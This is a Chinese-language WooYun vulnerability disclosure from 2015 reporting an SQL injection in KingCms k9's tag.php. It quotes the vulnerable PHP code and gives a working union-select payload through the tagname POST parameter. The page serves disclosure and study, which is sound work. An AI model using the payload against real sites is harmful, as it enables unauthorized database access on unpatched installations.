KingCms最新版（k9）注入一枚#4 | wooyun-2015-0100822| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0100822

漏洞标题：KingCms最新版（k9）注入一枚#4

漏洞作者：路人甲

提交时间：2015-03-12 11:38

修复时间：2015-04-30 18:48

公开时间：2015-04-30 18:48

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-12：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-04-30：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

KingCms最新版（k9）注入一枚#4

详细说明：

朋友的公司想购买kingcms的授权，让我帮忙看下。发现kingcms很长一段时间没更新了，憋了一段时间放出了最新版的k9(2014-12-13更新)，官网下下来学习一下。
在wooyun上看到了几个漏洞，如： WooYun: kingcms最新版sql注入漏洞
注入点：POST /apps/content/tag.php
注入参数：tagname 问题文件在/apps/content/tag.php

function _edit(){
	$u=new user;$u->auth_role('content_tag');
	$tid=kc_post('tid',2,0);
	$db=new db;
	$str=new str;
	if(empty($_POST['tagname'])) kc_tip('字段名不能为空!','form');
	if($str->len($_POST['tagname'])>30) kc_tip('标签名称过长！','form');
	$rs=$db->getRows_one('%s_content_tag','tid',"tagname='{$_POST['tagname']}'".(empty($tid)?'':" and tid<>$tid"));
	if(!empty($rs)) kc_tip('标签已存在，tid:'.$rs['tid'].'！','form');
无关代码

$_POST['tagname']没有经过处理就进入了$db->getRows_one，去看看$db->getRows_one

public function getRows_one($table,$insql='*',$where=null,$orderby=null) {
		$table=str_replace('%s',DB_PRE,$table);
		$sql="SELECT $insql FROM $table ";
		$sql.=empty($where) ? '' : ' WHERE '.$where;
		$sql.=empty($orderby) ? '' : ' ORDER BY '.$orderby;
		return $this->get_one($sql);
	}

在执行sql语句之前，也没有过滤，这里就造成了注入。
Kingcms在这里可以直接显示，因此
Payload：

jsoncallback=1&_=11&URL=http%3A%2F%2Flocalhost%2Fapps%2Fcontent%2Fcategroy.php&CMD=edit&TID=1&AJAX=1&USERID=10000&SIGN=89ee81f5f1f328f555ceb7e7655d9f2f&tagname='union select user()#&tid=3

注入成功，见下图

漏洞证明：

见详细说明

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

WooYun.org

漏洞概要 关注数(24) 关注此漏洞